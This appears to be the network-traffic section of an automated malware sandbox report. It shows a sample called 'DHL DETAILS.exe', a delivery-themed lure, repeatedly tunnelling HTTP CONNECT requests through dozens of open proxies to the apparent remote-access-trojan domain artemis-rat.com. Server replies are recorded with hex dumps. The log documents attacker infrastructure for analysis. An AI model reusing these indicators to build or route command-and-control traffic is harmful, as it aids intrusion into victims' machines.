Mar 9, 2024 13:14:17.076802969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.231184959 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1114	192.168.2.5	53384	172.67.25.204	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.080853939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.236093998 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1115	192.168.2.5	53376	38.54.101.254	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.080945969 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:19.260034084 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1116	192.168.2.5	53009	120.79.101.0	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.085351944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.439843893 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1117	192.168.2.5	52944	138.36.150.16	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.087950945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1118	192.168.2.5	51437	45.117.179.179	14791	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.087954998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224334002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1119	192.168.2.5	53418	104.18.251.208	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.151325941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.306771040 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1120	192.168.2.5	53400	192.163.202.88	10185	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.153584957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.723901987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333508015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.536958933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.036600113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.520966053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1121	192.168.2.5	51493	202.131.65.110	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.167362928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224334002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.333271027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.333153963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.649945021 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1122	192.168.2.5	52102	142.54.236.97	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.169637918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1123	192.168.2.5	53340	38.54.116.9	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.179511070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.588538885 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:21.676589012 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:24.330948114 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:29.453289986 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1124	192.168.2.5	53345	45.11.95.165	5219	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.183382034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.617404938 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1125	192.168.2.5	53344	212.108.155.205	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.194928885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1126	192.168.2.5	51358	103.130.218.135	32338	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.200504065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224419117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.333281994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.333147049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1127	192.168.2.5	53430	162.241.50.179	49858	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.216192007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.825592041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.552479982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.780255079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1128	192.168.2.5	51564	148.72.23.56	41383	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.216439009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.339302063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.380121946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.380481005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1129	192.168.2.5	53369	221.153.92.39	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.216682911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.518409014 CET	310	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1130	192.168.2.5	52798	117.160.250.163	8828	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.222601891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.885044098 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:17 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1131	192.168.2.5	53374	121.164.200.18	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.235796928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1132	192.168.2.5	53370	119.28.4.112	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.236263990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1133	192.168.2.5	53426	201.174.239.28	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.236728907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1134	192.168.2.5	53433	3.90.100.12	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.236965895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.453634977 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:17 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1135	192.168.2.5	53372	43.133.70.57	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.237473965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1136	192.168.2.5	53375	8.222.164.205	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.241411924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1137	192.168.2.5	51572	162.214.121.11	2993	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.251831055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1138	192.168.2.5	53379	14.103.24.20	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.252338886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

